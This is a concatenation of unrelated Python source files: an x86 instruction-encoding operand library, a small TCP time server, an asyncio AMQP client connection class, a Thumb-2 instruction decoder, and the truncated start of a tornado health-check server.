        return '<%s>' % self.__class__.__name__.lower()

    def assembler(self):
        # AT&T syntax, e.g. '%eax'
        return '%' + self.__class__.__name__.lower()

    def lowest8bits(self):
        """Return the 8-bit register aliasing this register's low byte.

        Only eax/ecx/edx/ebx (op < 4) have an 8-bit alias; others raise.
        """
        if self.op < 4:
            return registers8[self.op]
        else:
            raise ValueError


class FLOATREG(OPERAND):
    """An x87 floating-point stack register ST(n); subclasses set `num`."""
    width = 4

    def __repr__(self):
        return '<ST(%d)>' % self.num

    def assembler(self):
        raise TypeError("Float registers should not appear in assembler")


# The eight x87 stack slots.
class ST0(FLOATREG): num=0
class ST1(FLOATREG): num=1
class ST2(FLOATREG): num=2
class ST3(FLOATREG): num=3
class ST4(FLOATREG): num=4
class ST5(FLOATREG): num=5
class ST6(FLOATREG): num=6
class ST7(FLOATREG): num=7


class REG8(OPERAND):
    """An 8-bit register; subclasses set `op` (0-7)."""
    width = 1

    def __repr__(self):
        return '<%s>' % self.__class__.__name__.lower()

    def assembler(self):
        return '%' + self.__class__.__name__.lower()


# 32-bit registers with their mod/rm encoding numbers.
class EAX(REG): op=0
class ECX(REG): op=1
class EDX(REG): op=2
class EBX(REG): op=3
class ESP(REG): op=4
class EBP(REG): op=5
class ESI(REG): op=6
class EDI(REG): op=7

# 8-bit registers with their encoding numbers.
class AL(REG8): op=0
class CL(REG8): op=1
class DL(REG8): op=2
class BL(REG8): op=3
class AH(REG8): op=4
class CH(REG8): op=5
class DH(REG8): op=6
class BH(REG8): op=7
class IMM32(OPERAND):
    """A 32-bit immediate operand."""
    width = 4
    value = 0 # annotator hack

    def __init__(self, value):
        self.value = value

    def assembler(self):
        return '$%d' % (self.value,)

    def lowest8bits(self):
        """Truncate to a signed 8-bit immediate (two's complement)."""
        low = self.value & 0xFF
        return IMM8(low - 0x100 if low > 0x7F else low)


class IMM8(IMM32):
    """An 8-bit immediate operand."""
    width = 1


class IMM16(OPERAND): # only for RET
    """A 16-bit immediate operand."""
    width = 2
    value = 0 # annotator hack

    def __init__(self, value):
        self.value = value

    def assembler(self):
        return '$%d' % (self.value,)
class MODRM(OPERAND):
    """A mod/rm operand: `byte` is the mod/rm byte, `extradata` holds the
    optional SIB byte and/or displacement bytes as a chr-string."""
    width = 4

    def __init__(self, byte, extradata):
        self.byte = byte
        self.extradata = extradata

    def lowest8bits(self):
        # same addressing, reinterpreted with 1-byte width
        return MODRM8(self.byte, self.extradata)

    def assembler(self):
        """Decode byte/extradata back into AT&T assembler syntax."""
        mod = self.byte & 0xC0
        rm = self.byte & 0x07
        if mod == 0xC0:
            # register-direct mode
            return registers[rm].assembler()
        if self.byte == 0x05:
            # absolute [disp32]
            return '%d' % (unpack(self.extradata),)

        # displacement size implied by mod
        if mod == 0x00:
            offset_bytes = 0
        elif mod == 0x40:
            offset_bytes = 1
        else:
            offset_bytes = 4

        if rm == 4:
            # rm == 4 means a SIB byte follows
            SIB = ord(self.extradata[0])
            scale = (SIB & 0xC0) >> 6
            index = (SIB & 0x38) >> 3
            base = (SIB & 0x07)
            if base == 5 and mod == 0x00:
                # special case: no base register, disp32 instead
                offset_bytes = 4
                basename = ''
            else:
                basename = registers[base].assembler()
            if index == 4:
                # no index
                s = '(%s)' % (basename,)
            else:
                indexname = registers[index].assembler()
                s = '(%s,%s,%d)' % (basename, indexname, 1 << scale)
            offset = self.extradata[1:]
        else:
            s = '(%s)' % (registers[rm].assembler(),)
            offset = self.extradata
        assert len(offset) == offset_bytes
        if offset_bytes > 0:
            s = '%d%s' % (unpack(offset), s)
        return s

    def is_register(self):
        # True for register-direct mode (mod == 11b)
        mod = self.byte & 0xC0
        return mod == 0xC0

    def ofs_relative_to_ebp(self):
        # very custom: if self is a mem(ebp, ofs) then return ofs
        # otherwise raise ValueError
        mod = self.byte & 0xC0
        rm = self.byte & 0x07
        if mod == 0xC0:
            raise ValueError    # self is just a register
        if self.byte == 0x05:
            raise ValueError    # self is just an [immediate]
        if rm != 5:
            raise ValueError    # not a simple [ebp+ofs]
        offset = self.extradata
        if not offset:
            return 0
        else:
            return unpack(offset)

    def is_relative_to_ebp(self):
        # EAFP wrapper around ofs_relative_to_ebp()
        try:
            self.ofs_relative_to_ebp()
        except ValueError:
            return False
        else:
            return True

    def involves_ecx(self):
        # very custom: is ecx present in this mod/rm?
        mod = self.byte & 0xC0
        rm = self.byte & 0x07
        if mod != 0xC0 and rm == 4:
            # SIB form: ecx may be the base or the index
            SIB = ord(self.extradata[0])
            index = (SIB & 0x38) >> 3
            base = (SIB & 0x07)
            return base == ECX.op or index == ECX.op
        else:
            return rm == ECX.op


class MODRM64(MODRM):
    """8-byte (double-width) mod/rm operand, used for x87 loads/stores."""
    width = 8
    # XXX some logic that it cannot be register


class MODRM8(MODRM):
    """1-byte mod/rm operand."""
    width = 1
class REL32(OPERAND):
    """A 32-bit relative jump/call target, stored as an absolute address."""
    width = 4

    def __init__(self, absolute_target):
        self.absolute_target = absolute_target

    def assembler(self):
        return '%d' % (self.absolute_target,)


class MISSING(OPERAND):
    """Placeholder operand meaning 'not supplied'."""

    def __repr__(self):
        return '<MISSING>'
# ____________________________________________________________
# Public interface: the concrete operands to instructions
#
# NB.: UPPERCASE names represent classes of operands (the same
# instruction can have multiple modes, depending on these
# classes), while lowercase names are concrete operands.
# Singleton instances for each concrete register.
eax = EAX()
ecx = ECX()
edx = EDX()
ebx = EBX()
esp = ESP()
ebp = EBP()
esi = ESI()
edi = EDI()
al = AL()
cl = CL()
dl = DL()
bl = BL()
ah = AH()
ch = CH()
dh = DH()
bh = BH()

# Indexed by the mod/rm encoding number (op).
registers = [eax, ecx, edx, ebx, esp, ebp, esi, edi]
registers8 = [al, cl, dl, bl, ah, ch, dh, bh]

# Give each register a one-hot bitmask for register-set bookkeeping.
for r in registers + registers8:
    r.bitmask = 1 << r.op
del r

# lowercase aliases for the operand classes (see naming note above)
imm32 = IMM32
imm8 = IMM8
imm16 = IMM16
rel32 = REL32
def imm(value):
    """Build the smallest immediate operand that can hold `value`."""
    if single_byte(value):
        return imm8(value)
    else:
        return imm32(value)

def memregister(register):
    """mod/rm operand in register-direct mode for a 32-bit register."""
    assert register.width == 4
    return MODRM(0xC0 | register.op, '')

def mem(basereg, offset=0):
    """[basereg + offset] memory operand."""
    return memSIB(basereg, None, 0, offset)

def memSIB(base, index, scaleshift, offset):
    """[base + index << scaleshift + offset] memory operand (4-byte)."""
    return _SIBencode(MODRM, base, index, scaleshift, offset)

def memSIB64(base, index, scaleshift, offset):
    """Same addressing as memSIB but as an 8-byte operand."""
    return _SIBencode(MODRM64, base, index, scaleshift, offset)

def memregister8(register):
    """mod/rm operand in register-direct mode for an 8-bit register."""
    assert register.width == 1
    return MODRM8(0xC0 | register.op, '')

def mem8(basereg, offset=0):
    """1-byte [basereg + offset] memory operand."""
    return memSIB8(basereg, None, 0, offset)

def memSIB8(base, index, scaleshift, offset):
    """1-byte [base + index << scaleshift + offset] memory operand."""
    return _SIBencode(MODRM8, base, index, scaleshift, offset)
def _SIBencode(cls, base, index, scaleshift, offset):
    """Encode a [base + index << scaleshift + offset] address as a `cls`
    (MODRM/MODRM8/MODRM64) instance, choosing the shortest valid form."""
    assert base is None or isinstance(base, REG)
    assert index is None or (isinstance(index, REG) and index is not esp)
    assert 0<=scaleshift<4
    if base is None:
        if index is None:
            # absolute [disp32]
            return cls(0x05, packimm32(offset))
        if scaleshift > 0:
            # scaled index with no base: SIB with base field 101 + disp32
            return cls(0x04, chr((scaleshift<<6) | (index.op<<3) | 0x05) +
                       packimm32(offset))
        # unscaled index alone is just a base register
        base = index
        index = None
    if index is not None:
        SIB = chr((scaleshift<<6) | (index.op<<3) | base.op)
    elif base is esp:
        # esp as base always needs a SIB byte (esp means "SIB follows")
        SIB = '\x24'
    elif offset == 0 and base is not ebp:
        # [reg] with no displacement (ebp would mean disp32-absolute)
        return cls(base.op, '')
    elif single_byte(offset):
        return cls(0x40 | base.op, packimm8(offset))
    else:
        return cls(0x80 | base.op, packimm32(offset))
    # SIB forms, with 0/8/32-bit displacement
    if offset == 0 and base is not ebp:
        return cls(0x04, SIB)
    elif single_byte(offset):
        return cls(0x44, SIB + packimm8(offset))
    else:
        return cls(0x84, SIB + packimm32(offset))

def fixedsize_ebp_ofs(offset):
    """[ebp + offset] always encoded with a 4-byte displacement, so the
    offset can be patched later without changing the instruction length."""
    return MODRM(0x80 | EBP.op, packimm32(offset))
def single_byte(value):
    """True if `value` fits in a signed 8-bit immediate."""
    return -0x80 <= value <= 0x7F

def packimm32(i):
    """Encode `i` as 4 little-endian bytes (as a chr-string)."""
    b0 = chr(i & 0xFF)
    b1 = chr((i >> 8) & 0xFF)
    b2 = chr((i >> 16) & 0xFF)
    b3 = chr((i >> 24) & 0xFF)
    return b0 + b1 + b2 + b3

def packimm8(i):
    """Encode `i` as a single byte; negatives are two's-complemented."""
    byte = i + 256 if i < 0 else i
    return chr(byte)

def packimm16(i):
    """Encode `i` as 2 little-endian bytes."""
    lo = chr(i & 0xFF)
    hi = chr((i >> 8) & 0xFF)
    return lo + hi
def unpack(s):
    """Decode a 1-, 2- or 4-byte little-endian chr-string into a signed int.

    The 4-byte case goes through pypy's intmask() to wrap to machine-word
    signed semantics under RPython translation.
    """
    assert len(s) in (1, 2, 4)
    if len(s) == 1:
        a = ord(s[0])
        if a > 0x7f:
            a -= 0x100
    else:
        a = ord(s[0]) | (ord(s[1]) << 8)
        if len(s) == 2:
            if a > 0x7fff:
                a -= 0x10000
        else:
            a |= (ord(s[2]) << 16) | (ord(s[3]) << 24)
            a = intmask(a)
    return a
# Shared singleton for "operand not supplied".
missing = MISSING()

# __________________________________________________________
# Abstract base class, with methods like NOP(), ADD(x, y), etc.

class I386CodeBuilder(object):
    """Abstract sink for encoded instruction bytes; ri386setup attaches one
    method per instruction at import time."""
    def write(self, data):
        raise NotImplementedError
    def tell(self):
        raise NotImplementedError

import ri386setup  # side-effect: add methods to I386CodeBuilder
|
#Arife Oran - 160401071
"""One-shot TCP time server: accepts a single client, asks the operator for
a UTC offset on stdin, and sends the corresponding epoch timestamp."""
import socket
import time
import datetime

IP = '192.168.1.106'
Port = 142  # NOTE: ports below 1024 require elevated privileges


def timeStamp():
    """Milliseconds since the Unix epoch (UTC)."""
    return int((datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)


try:
    serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    serverSocket.bind((IP, Port))
    print("IP: ", IP, " ", Port, ".port dinleniyor")
    serverSocket.listen(5)
except socket.error as message:
    print("Hata!", message)

conn, adrr = serverSocket.accept()
startTime = time.time()
print("Bağlantı kabul edildi")

msg = "Bağlantı Kuruldu"
# BUG FIX: sendto() with an explicit address is for datagram sockets; on a
# connected TCP socket use sendall().
conn.sendall(msg.encode())

temp = 1
while (temp):
    data = input("Zaman Dilimini Giriniz : UTC ")
    if (data.startswith("+") or data.startswith("-")):
        utc = int(data) - 3  # presumably the server clock is UTC+3 — confirm
        # BUG FIX: the original rebound the name `timeStamp` to an int here,
        # shadowing the function above; use a distinct variable instead.
        ts_ms = timeStamp() + int(utc) * 3600000
        sendTimeStamp = str(ts_ms) + '-UTC' + str(data)
        print(sendTimeStamp)
        conn.sendall(str(sendTimeStamp).encode('utf-8'))
        sTime = float(ts_ms) / 1000.0
        timeInfo = datetime.datetime.fromtimestamp(sTime).strftime('%m/%d/%Y %H:%M:%S.%f')
        print(timeInfo)
        temp = 0
    else:
        print("Girdiğiniz zaman dilimi hatalıdır!")

conn.close()
serverSocket.close()
import asyncio
import logging
import platform
import ssl
import typing
from base64 import b64decode
from contextlib import suppress
import pamqp.frame
from pamqp import ProtocolHeader
from pamqp import specification as spec
from pamqp.heartbeat import Heartbeat
from yarl import URL
from . import exceptions as exc
from .auth import AuthMechanism
from .base import Base, task
from .channel import Channel
from .tools import censor_url
from .types import (
ArgumentsType, SSLCerts,
URLorStr
)
from .version import __version__
log = logging.getLogger(__name__)

# Register default ports for the AMQP URL schemes so URL objects resolve a
# port when none is given. Presumably newer yarl versions dropped the
# DEFAULT_PORTS mapping, hence the ImportError guard — confirm against the
# pinned yarl version.
try:
    from yarl import DEFAULT_PORTS

    DEFAULT_PORTS['amqp'] = 5672
    DEFAULT_PORTS['amqps'] = 5671
except ImportError:
    pass
# Client identity strings advertised to the broker via the Connection.StartOk
# client properties (see Connection._client_capabilities).
PRODUCT = 'aiormq'
PLATFORM = '{} {} ({} build {})'.format(
    platform.python_implementation(),
    platform.python_version(),
    *platform.python_build()
)
def parse_bool(v: str):
    """Interpret a query-string value as a boolean flag."""
    truthy_words = ('true', 'yes', 'y', 'enable', 'on')
    return v == '1' or v.lower() in truthy_words
def parse_int(v: str):
    """Parse a query-string value as an integer; malformed input yields 0."""
    try:
        result = int(v)
    except ValueError:
        result = 0
    return result
class Connection(Base):
    """A single AMQP 0-9-1 client connection.

    Performs the protocol handshake, multiplexes channels, runs the frame
    reader loop and keeps the connection alive with heartbeats on top of an
    asyncio stream pair.
    """

    # Default per-channel frame queue size.
    FRAME_BUFFER = 10

    # Interval between sending heartbeats based on the heartbeat(timeout)
    HEARTBEAT_INTERVAL_MULTIPLIER = 0.5

    # Allow two missed heartbeats (based on heartbeat(timeout)
    HEARTBEAT_GRACE_MULTIPLIER = 3

    # Pre-marshalled heartbeat frame for channel 0.
    _HEARTBEAT = pamqp.frame.marshal(Heartbeat(), 0)

    @staticmethod
    def _parse_ca_data(data) -> typing.Optional[bytes]:
        # The `cadata` URL query parameter carries base64-encoded CA certs.
        return b64decode(data) if data else data

    def __init__(self, url: URLorStr, *, parent=None,
                 loop: asyncio.AbstractEventLoop = None):
        """Parse the AMQP URL and prepare (but do not open) the connection.

        :param url: amqp:// or amqps:// URL; SSL, heartbeat and vhost
            options are taken from its query string and path.
        :param parent: optional parent for the Base task hierarchy.
        :param loop: event loop to run on (defaults to the current one).
        """
        super().__init__(
            loop=loop or asyncio.get_event_loop(),
            parent=parent
        )

        self.url = URL(url)
        # An empty or "/" path means the default vhost "/"; otherwise the
        # vhost is the path without its leading slash.
        if self.url.path == '/' or not self.url.path:
            self.vhost = '/'
        else:
            self.vhost = self.url.path[1:]

        self.reader = None  # type: asyncio.StreamReader
        self.writer = None  # type: asyncio.StreamWriter

        self.ssl_certs = SSLCerts(
            cafile=self.url.query.get('cafile'),
            capath=self.url.query.get('capath'),
            cadata=self._parse_ca_data(self.url.query.get('cadata')),
            key=self.url.query.get('keyfile'),
            cert=self.url.query.get('certfile'),
            verify=self.url.query.get('no_verify_ssl', '0') == '0'
        )

        # Set once the first real frame has been seen (used to detect the
        # broker replying with a raw "AMQP" protocol header).
        self.started = False
        self.__lock = asyncio.Lock(loop=self.loop)
        self.__drain_lock = asyncio.Lock(loop=self.loop)

        self.channels = {}  # type: typing.Dict[int, typing.Optional[Channel]]

        self.server_properties = None  # type: spec.Connection.OpenOk
        self.connection_tune = None  # type: spec.Connection.TuneOk
        self.last_channel = 1

        self.heartbeat_monitoring = parse_bool(self.url.query.get(
            'heartbeat_monitoring', '1'
        ))
        self.heartbeat_timeout = parse_int(self.url.query.get(
            'heartbeat', '0'
        ))
        self.heartbeat_last_received = 0
        self.last_channel_lock = asyncio.Lock(loop=self.loop)
        self.connected = asyncio.Event(loop=self.loop)

    @property
    def lock(self):
        """Frame-read lock; refuses to hand it out once the connection closed."""
        if self.is_closed:
            raise RuntimeError('%r closed' % self)

        return self.__lock

    async def drain(self):
        """Flush the write buffer, serialising concurrent drain() calls."""
        if not self.writer:
            raise RuntimeError("Writer is %r" % self.writer)

        async with self.__drain_lock:
            return await self.writer.drain()

    @property
    def is_opened(self):
        return self.writer is not None and not self.is_closed

    def __str__(self):
        # Credentials are stripped from the URL before display.
        return str(censor_url(self.url))

    def _get_ssl_context(self):
        """Build an SSLContext from the URL's certificate query parameters."""
        context = ssl.create_default_context(
            (
                ssl.Purpose.SERVER_AUTH
                if self.ssl_certs.key
                else ssl.Purpose.CLIENT_AUTH
            ),
            capath=self.ssl_certs.capath,
            cafile=self.ssl_certs.cafile,
            cadata=self.ssl_certs.cadata,
        )

        if self.ssl_certs.key:
            context.load_cert_chain(
                self.ssl_certs.cert,
                self.ssl_certs.key,
            )

        if not self.ssl_certs.verify:
            context.check_hostname = False
            context.verify_mode = ssl.CERT_NONE

        return context

    @staticmethod
    def _client_capabilities():
        """Client properties advertised to the broker in Connection.StartOk."""
        return {
            'platform': PLATFORM,
            'version': __version__,
            'product': PRODUCT,
            'capabilities': {
                'authentication_failure_close': True,
                'basic.nack': True,
                'connection.blocked': False,
                'consumer_cancel_notify': True,
                'publisher_confirms': True
            },
            'information': 'See https://github.com/mosquito/aiormq/',
        }

    @staticmethod
    def _credentials_class(start_frame: spec.Connection.Start):
        """Pick the first broker-offered SASL mechanism that we support."""
        for mechanism in start_frame.mechanisms.decode().split():
            with suppress(KeyError):
                return AuthMechanism[mechanism]
        raise exc.AuthenticationError(
            start_frame.mechanisms,
            [m.name for m in AuthMechanism]
        )

    async def __rpc(self, request: spec.Frame, wait_response=True):
        """Send *request* on channel 0 and optionally await the reply frame.

        Raises ProbableAuthenticationError / ConnectionClosed when the
        broker answers with Connection.Close instead.
        """
        self.writer.write(pamqp.frame.marshal(request, 0))

        if not wait_response:
            return

        _, _, frame = await self.__receive_frame()

        if request.synchronous and frame.name not in request.valid_responses:
            raise spec.AMQPInternalError(frame, frame)
        elif isinstance(frame, spec.Connection.Close):
            # 403 during the handshake almost always means bad credentials.
            if frame.reply_code == 403:
                raise exc.ProbableAuthenticationError(frame.reply_text)
            raise exc.ConnectionClosed(frame.reply_code, frame.reply_text)
        return frame

    @task
    async def connect(self):
        """Open the transport, run the AMQP handshake and start the
        reader/heartbeat tasks. Returns True on success."""
        if self.writer is not None:
            raise RuntimeError("Already connected")

        ssl_context = None

        if self.url.scheme == 'amqps':
            # Context creation reads certificate files from disk — keep it
            # off the event loop.
            ssl_context = await self.loop.run_in_executor(
                None, self._get_ssl_context
            )

        try:
            self.reader, self.writer = await asyncio.open_connection(
                self.url.host, self.url.port, ssl=ssl_context,
                loop=self.loop
            )
        except OSError as e:
            raise ConnectionError(*e.args) from e

        try:
            protocol_header = ProtocolHeader()
            self.writer.write(protocol_header.marshal())

            res = await self.__receive_frame()
            _, _, frame = res  # type: spec.Connection.Start
            self.heartbeat_last_received = self.loop.time()
        except EOFError as e:
            raise exc.IncompatibleProtocolError(*e.args) from e

        credentials = self._credentials_class(frame)

        self.server_properties = frame.server_properties

        # noinspection PyTypeChecker
        self.connection_tune = await self.__rpc(spec.Connection.StartOk(
            client_properties=self._client_capabilities(),
            mechanism=credentials.name,
            response=credentials.value(self).marshal()
        ))  # type: spec.Connection.Tune

        # A client-requested heartbeat overrides the broker's suggestion.
        if self.heartbeat_timeout > 0:
            self.connection_tune.heartbeat = self.heartbeat_timeout

        await self.__rpc(spec.Connection.TuneOk(
            channel_max=self.connection_tune.channel_max,
            frame_max=self.connection_tune.frame_max,
            heartbeat=self.connection_tune.heartbeat,
        ), wait_response=False)

        await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))

        # noinspection PyAsyncCall
        self.create_task(self.__reader())

        # noinspection PyAsyncCall
        self.create_task(self.__heartbeat_task())
        self.loop.call_soon(self.connected.set)
        return True

    async def __heartbeat_task(self):
        """Periodically send heartbeats and monitor the broker's liveness."""
        if not self.connection_tune.heartbeat:
            return

        heartbeat_interval = (
            self.connection_tune.heartbeat * self.HEARTBEAT_INTERVAL_MULTIPLIER
        )
        heartbeat_grace_timeout = (
            self.connection_tune.heartbeat * self.HEARTBEAT_GRACE_MULTIPLIER
        )

        while True:
            await asyncio.sleep(heartbeat_interval)

            # Send heartbeat to server unconditionally
            self.writer.write(self._HEARTBEAT)

            if not self.heartbeat_monitoring:
                continue

            # Check if the server sent us something
            # within the heartbeat grace period
            last_heartbeat = self.loop.time() - self.heartbeat_last_received

            if last_heartbeat <= heartbeat_grace_timeout:
                continue

            await self.close(
                ConnectionError(
                    'Server connection probably hang, last heartbeat '
                    'received %.3f seconds ago' % last_heartbeat
                )
            )

            return

    async def __receive_frame(self) -> typing.Tuple[int, int, spec.Frame]:
        """Read one complete frame; returns pamqp's (weight, channel, frame)."""
        async with self.lock:
            frame_header = await self.reader.readexactly(1)

            # BUG FIX: the original compared against b'\0x00' — four bytes
            # (NUL, 'x', '0', '0') — which a one-byte read can never equal,
            # so the error branch was unreachable. A leading NUL byte means
            # the broker sent a textual error instead of a frame.
            if frame_header == b'\x00':
                raise spec.AMQPFrameError(await self.reader.read())

            frame_header += await self.reader.readexactly(6)

            # Before the handshake completes, an "AMQP" header here means the
            # broker rejected our protocol version.
            if not self.started and frame_header.startswith(b'AMQP'):
                raise spec.AMQPSyntaxError
            else:
                self.started = True

            frame_type, _, frame_length = pamqp.frame.frame_parts(
                frame_header
            )

            # +1 for the trailing frame-end octet.
            frame_payload = await self.reader.readexactly(
                frame_length + 1
            )

            return pamqp.frame.unmarshal(frame_header + frame_payload)

    @staticmethod
    def __exception_by_code(frame: spec.Connection.Close):
        """Map an AMQP Connection.Close reply code to a typed exception."""
        if frame.reply_code == 501:
            return exc.ConnectionFrameError(frame.reply_text)
        elif frame.reply_code == 502:
            return exc.ConnectionSyntaxError(frame.reply_text)
        elif frame.reply_code == 503:
            return exc.ConnectionCommandInvalid(frame.reply_text)
        elif frame.reply_code == 504:
            return exc.ConnectionChannelError(frame.reply_text)
        elif frame.reply_code == 505:
            return exc.ConnectionUnexpectedFrame(frame.reply_text)
        elif frame.reply_code == 506:
            return exc.ConnectionResourceError(frame.reply_text)
        elif frame.reply_code == 530:
            return exc.ConnectionNotAllowed(frame.reply_text)
        elif frame.reply_code == 540:
            return exc.ConnectionNotImplemented(frame.reply_text)
        elif frame.reply_code == 541:
            return exc.ConnectionInternalError(frame.reply_text)
        else:
            return exc.ConnectionClosed(frame.reply_code, frame.reply_text)

    @task
    async def __reader(self):
        """Main frame loop: dispatch incoming frames to their channels."""
        try:
            while not self.reader.at_eof():
                weight, channel, frame = await self.__receive_frame()
                # Any traffic counts as broker liveness for the monitor.
                self.heartbeat_last_received = self.loop.time()

                if channel == 0:
                    if isinstance(frame, spec.Connection.Close):
                        return await self.close(self.__exception_by_code(frame))
                    elif isinstance(frame, Heartbeat):
                        continue

                    log.error('Unexpected frame %r', frame)
                    continue

                if self.channels.get(channel) is None:
                    log.exception(
                        "Got frame for closed channel %d: %r", channel, frame
                    )
                    continue

                ch = self.channels[channel]

                channel_close_responses = (
                    spec.Channel.Close,
                    spec.Channel.CloseOk
                )

                # Mark the channel closed, but still deliver the closing frame.
                if isinstance(frame, channel_close_responses):
                    self.channels[channel] = None

                await ch.frames.put((weight, frame))
        except asyncio.CancelledError as e:
            log.debug("Reader task cancelled:", exc_info=e)
        except asyncio.IncompleteReadError as e:
            log.debug("Can not read bytes from server:", exc_info=e)
            await self.close(ConnectionError(*e.args))
        except Exception as e:
            log.debug("Reader task exited because:", exc_info=e)
            await self.close(e)

    async def _on_close(self, exc=exc.ConnectionClosed(0, 'normal closed')):
        """Tear down the transport; clears reader/writer so concurrent users
        observe the connection as closed before the socket goes away."""
        writer = self.writer
        self.reader = None
        self.writer = None

        # noinspection PyShadowingNames
        writer.close()
        return await writer.wait_closed()

    @property
    def server_capabilities(self) -> ArgumentsType:
        return self.server_properties['capabilities']

    @property
    def basic_nack(self) -> bool:
        return self.server_capabilities.get('basic.nack')

    @property
    def consumer_cancel_notify(self) -> bool:
        return self.server_capabilities.get('consumer_cancel_notify')

    @property
    def exchange_exchange_bindings(self) -> bool:
        return self.server_capabilities.get('exchange_exchange_bindings')

    @property
    def publisher_confirms(self):
        return self.server_capabilities.get('publisher_confirms')

    async def channel(self, channel_number: int = None,
                      publisher_confirms=True,
                      frame_buffer=FRAME_BUFFER, **kwargs) -> Channel:
        """Open a new channel, auto-allocating a number when none is given."""

        await self.connected.wait()

        if self.is_closed:
            raise RuntimeError('%r closed' % self)

        if not self.publisher_confirms and publisher_confirms:
            raise ValueError("Server doesn't support publisher_confirms")

        if channel_number is None:
            async with self.last_channel_lock:
                # Scan forward for the next free channel id, wrapping at the
                # protocol maximum of 65535.
                while self.last_channel in self.channels.keys():
                    self.last_channel += 1

                    if self.last_channel > 65535:
                        log.warning("Resetting channel number for %r", self)
                        self.last_channel = 1

                    # switching context for prevent blocking event-loop
                    await asyncio.sleep(0)

                channel_number = self.last_channel
        elif channel_number in self.channels:
            raise ValueError("Channel %d already used" % channel_number)

        if channel_number < 0 or channel_number > 65535:
            raise ValueError('Channel number too large')

        channel = Channel(
            self, channel_number, frame_buffer=frame_buffer,
            publisher_confirms=publisher_confirms, **kwargs
        )

        self.channels[channel_number] = channel

        try:
            await channel.open()
        except Exception:
            self.channels[channel_number] = None
            raise

        return channel

    async def __aenter__(self):
        await self.connect()
        # BUG FIX: the original returned None, so `async with Connection(...)
        # as conn:` bound conn to None; return the connection itself.
        return self
async def connect(url, *args, **kwargs) -> Connection:
    """Create a Connection for *url* and establish it.

    On any failure the half-open connection is closed with the triggering
    exception before it is re-raised.
    """
    connection = Connection(url, *args, **kwargs)

    try:
        await connection.connect()
    except Exception as e:
        await connection.close(e)
        raise

    return connection
|
from lsl_register_t2 import LslRegisterT2
from lsr_register_t2 import LsrRegisterT2
from asr_register_t2 import AsrRegisterT2
from ror_register_t2 import RorRegisterT2
from sxtah_t1 import SxtahT1
from sxth_t2 import SxthT2
from uxtah_t1 import UxtahT1
from uxth_t2 import UxthT2
from sxtab16_t1 import Sxtab16T1
from sxtb16_t1 import Sxtb16T1
from uxtab16_t1 import Uxtab16T1
from uxtb16_t1 import Uxtb16T1
from sxtab_t1 import SxtabT1
from sxtb_t2 import SxtbT2
from uxtab_t1 import UxtabT1
from uxtb_t2 import UxtbT2
import thumb_parallel_addition_and_subtraction_signed
import thumb_parallel_addition_and_subtraction_unsigned
import thumb_miscellaneous_operations
def decode_instruction(instr):
    """Dispatch a 32-bit Thumb-2 data-processing (register) encoding to its
    instruction class (or to a sub-decoder for the parallel add/sub and
    miscellaneous groups).

    NOTE(review): `instr` is sliced like a bit container whose slices compare
    against "0b..." strings, and `instr[8]` / `instr[24]` are used for bare
    truthiness — if `instr` were a plain string, '0' would also be truthy, so
    this presumably relies on a bit-vector type whose indexing yields 0/1 or
    bool; confirm against the type used by callers. Encodings matching no
    branch fall through and return None implicitly.
    """
    if instr[8:11] == "0b000" and instr[24:28] == "0b0000":
        # Logical Shift Left
        return LslRegisterT2
    elif instr[8:11] == "0b001" and instr[24:28] == "0b0000":
        # Logical Shift Right
        return LsrRegisterT2
    elif instr[8:11] == "0b010" and instr[24:28] == "0b0000":
        # Arithmetic Shift Right
        return AsrRegisterT2
    elif instr[8:11] == "0b011" and instr[24:28] == "0b0000":
        # Rotate Right
        return RorRegisterT2
    # For the extend/extend-and-add pairs below, Rn == 0b1111 selects the
    # plain extend form; any other Rn selects the extend-and-add form.
    elif instr[8:12] == "0b0000" and instr[24] and instr[12:16] != "0b1111":
        # Signed Extend and Add Halfword
        return SxtahT1
    elif instr[8:12] == "0b0000" and instr[24] and instr[12:16] == "0b1111":
        # Signed Extend Halfword
        return SxthT2
    elif instr[8:12] == "0b0001" and instr[24] and instr[12:16] != "0b1111":
        # Unsigned Extend and Add Halfword
        return UxtahT1
    elif instr[8:12] == "0b0001" and instr[24] and instr[12:16] == "0b1111":
        # Unsigned Extend Halfword
        return UxthT2
    elif instr[8:12] == "0b0010" and instr[24] and instr[12:16] != "0b1111":
        # Signed Extend and Add Byte 16-bit
        return Sxtab16T1
    elif instr[8:12] == "0b0010" and instr[24] and instr[12:16] == "0b1111":
        # Signed Extend Byte 16-bit
        return Sxtb16T1
    elif instr[8:12] == "0b0011" and instr[24] and instr[12:16] != "0b1111":
        # Unsigned Extend and Add Byte 16-bit
        return Uxtab16T1
    elif instr[8:12] == "0b0011" and instr[24] and instr[12:16] == "0b1111":
        # Unsigned Extend Byte 16-bit
        return Uxtb16T1
    elif instr[8:12] == "0b0100" and instr[24] and instr[12:16] != "0b1111":
        # Signed Extend and Add Byte
        return SxtabT1
    elif instr[8:12] == "0b0100" and instr[24] and instr[12:16] == "0b1111":
        # Signed Extend Byte
        return SxtbT2
    elif instr[8:12] == "0b0101" and instr[24] and instr[12:16] != "0b1111":
        # Unsigned Extend and Add Byte
        return UxtabT1
    elif instr[8:12] == "0b0101" and instr[24] and instr[12:16] == "0b1111":
        # Unsigned Extend Byte
        return UxtbT2
    elif instr[8] and instr[24:26] == "0b00":
        # Parallel addition and subtraction, signed
        return thumb_parallel_addition_and_subtraction_signed.decode_instruction(instr)
    elif instr[8] and instr[24:26] == "0b01":
        # Parallel addition and subtraction, unsigned
        return thumb_parallel_addition_and_subtraction_unsigned.decode_instruction(instr)
    # NOTE(review): if instr[8] is truthy, the branch two above already
    # captured instr[24:26] == "0b01", so this arm is reachable only when
    # instr[8] is falsy — which then contradicts instr[8:10] == "0b01"
    # unless indexing and slicing use different conventions. Confirm.
    elif instr[8:10] == "0b01" and instr[24:26] == "0b01":
        # Miscellaneous operations
        return thumb_miscellaneous_operations.decode_instruction(instr)
|
from absl import logging
import datetime
import os.path
import tornado.ioloop
import tornado.web
from icubam.db import store
class HealthHandler(tornado.web.RequestHandler):
  """Liveness endpoint that reports the server's start time."""
  ROUTE = '/health'

  def initialize(self, start_time):
    # start_time is injected through the route's handler kwargs
    # by BaseServer.add_handler.
    self.start_time = start_time

  def get(self):
    # Respond with the formatted start time.
    return self.write("{0:%Y/%m/%d %H:%M:%S}".format(self.start_time))
class BaseServer:
  """Base class for ICUBAM servers.

  Builds a tornado Application with a shared /health endpoint and a
